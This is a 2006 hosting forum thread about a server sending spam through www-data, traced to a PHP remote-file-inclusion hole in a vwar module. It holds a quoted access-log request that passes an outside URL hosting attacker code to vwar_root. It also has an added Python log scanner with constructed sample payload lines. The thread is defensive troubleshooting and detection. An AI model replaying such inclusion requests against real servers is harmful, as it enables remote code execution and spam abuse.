#1 rayit, 17th May 2006, 09:30
spam from my server from account www-data?

Seems my server was listed on some spam filter sites..

I see a lot of messages in the mailq,
all starting with www-data@.....

How to prevent this, what is it???


thanks

Raymond
RayIT

After some googling something like this should be in the vhost file
to know which domain is giving the problem???

php_admin_value sendmail_path "/usr/sbin/sendmail -t -i -fUSER at example.com"

Maybe for future updates of ISPConfig??

Are there other solutions??

Biggest problem is I can not find the website which has the bad script??!!!

example:

May 17 06:39:07 ns1 postfix/qmgr[32348]: 60A0C372868: from=<www-data@ns1.rayit.com>, size=4422, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6559F3728E0: from=<www-data@ns1.rayit.com>, size=4423, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6D48E373256: from=<www-data@ns1.rayit.com>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 66857372E3C: from=<www-data@ns1.rayit.com>, size=4423, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6CA233732CE: from=<www-data@ns1.rayit.com>, size=4427, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 619D9372802: from=<www-data@ns1.rayit.com>, size=4422, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 67217372C41: from=<www-data@ns1.rayit.com>, size=4412, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6A6FA372831: from=<www-data@ns1.rayit.com>, size=4425, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6F496372827: from=<www-data@ns1.rayit.com>, size=4419, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 650D6372B01: from=<www-data@ns1.rayit.com>, size=4417, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 61AD43728AE: from=<www-data@ns1.rayit.com>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 627E7372D8A: from=<www-data@ns1.rayit.com>, size=4424, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 64C7237317B: from=<www-data@ns1.rayit.com>, size=4421, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 69DCD3729D5: from=<www-data@ns1.rayit.com>, size=4412, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 694713729E7: from=<www-data@ns1.rayit.com>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 65149372A83: from=<www-data@ns1.rayit.com>, size=4415, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 67DEA372EF5: from=<www-data@ns1.rayit.com>, size=4415, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 67FFC372EFA: from=<www-data@ns1.rayit.com>, size=4414, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6BEB1372EA2: from=<www-data@ns1.rayit.com>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 63935372D18: from=<www-data@ns1.rayit.com>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6B528372FF8: from=<www-data@ns1.rayit.com>, size=4423, nrcpt=1 (queue active)

Last edited by rayit; 17th May 2006 at 14:29.

#2 falko, 17th May 2006, 16:09

Seems like someone is abusing a contact form, guestbook, etc. on one of your web sites to send spam...

#3 rayit, 17th May 2006, 16:40
How do I know which web?

I can not find which web is causing the problem.

#4 falko, 17th May 2006, 17:09

You could check your Apache's access log.

#5 rayit, 17th May 2006, 17:42
help...

can find nothing in the apache log files

maybe have a look?

http://www.rayit.com/syslog

and

http://www.rayit.com/ispconfig_access_log

please have a look for me...

#6 rayit, 18th May 2006, 00:38
problem probably found

www.bob-gaming.nl||||163464||||81.199.83.160 - - [17/May/2006:10:29:27 +0200]
"POST /modules/vwar/admin/admin.php?vwar_root=http://albax.host.sk/.xpl/phpmailer.txt?
HTTP/1.1" 200 163464
"http://www.bob-gaming.nl/modules/vwar/admin/admin.php?vwar_root=http://albax.host.sk/.xpl/phpmailer.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"


Seems to be the problem, I think.

#7 Norman, 18th May 2006, 00:50

Turn him off asap and ask user to resolve.

#8 till, 18th May 2006, 09:30

I can only agree with Norman, turn the account off as soon as possible, e.g. with an .htaccess file. Your spam problem seems to be only the tip of the iceberg. The script seems to allow execution of external PHP code provided by a URL to the variable vwar_root.
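
One way to run the access-log check suggested in #4 across all vhosts, added here as an example and not posted by anyone in the thread: it parses lines in the layout shown in #6 and flags requests that pass an absolute URL as a query parameter value, the pattern described in #8. The sample lines, host names and addresses are constructed, and the field layout is assumed from the single line in #6.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Layout assumed from the line in #6:
# vhost||||bytes||||client - - [time] "METHOD target PROTO" status size ...
LINE_RE = re.compile(
    r'^(?P<vhost>[^|]+)\|{4}\d+\|{4}(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)
# A parameter value that is itself an absolute URL.
REMOTE_VALUE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def remote_include_hits(lines):
    """Yield (vhost, client, path, param, status) for every request whose
    query string passes an absolute URL as a parameter value."""
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the expected layout
        target = urlsplit(m["target"])
        # parse_qsl percent-decodes, so http%3A%2F%2F... is caught as well
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            if REMOTE_VALUE.match(value):
                yield (m["vhost"], m["client"], target.path, name, int(m["status"]))


def hits_per_vhost(lines):
    """Count flagged requests per vhost to show which site to look at first."""
    return Counter(hit[0] for hit in remote_include_hits(lines))


# Constructed sample lines (example host names, documentation addresses).
SAMPLE_LOG = [
    'www.clan.example||||163464||||192.0.2.10 - - [17/May/2006:10:29:27 +0200] '
    '"POST /modules/vwar/admin/admin.php?vwar_root=http://files.example/inc.txt? HTTP/1.1" 200 163464 "-" "Mozilla/4.0"',
    'www.clan.example||||5120||||192.0.2.11 - - [17/May/2006:10:31:02 +0200] '
    '"GET /modules/vwar/admin/admin.php?vwar_root=http%3A%2F%2Ffiles.example%2Finc.txt HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    'www.shop.example||||2048||||198.51.100.7 - - [17/May/2006:10:32:40 +0200] '
    '"GET /index.php?page=about HTTP/1.1" 200 2048 "-" "Mozilla/4.0"',
    'www.shop.example||||310||||198.51.100.7 - - [17/May/2006:10:33:05 +0200] '
    '"GET /images/logo.png HTTP/1.1" 304 310 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for hit in remote_include_hits(SAMPLE_LOG):
        print(*hit)
    print(dict(hits_per_vhost(SAMPLE_LOG)))
```

A hit is a lead to review, not proof: legitimate redirect or return parameters also carry URLs.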

#9 rayit, 18th May 2006, 14:07
thanks

I chmod 000 the files and made user root
hopefully if user will update to newest release problems will be fixed..

Will point the webmaster of the site to

http://www.vwar.de/

various security leaks which could allow malicious users to include a (remote) file and eg. execute php commands on the server hosting vwar

thanks

Raymond
RayIT

#10 dayjahone, 15th March 2012, 16:37

I think I have the same problem. Sorry for the lame question, but where do I go to look at the apache log? I'm running Ubuntu.

Last edited by dayjahone; 15th March 2012 at 16:42.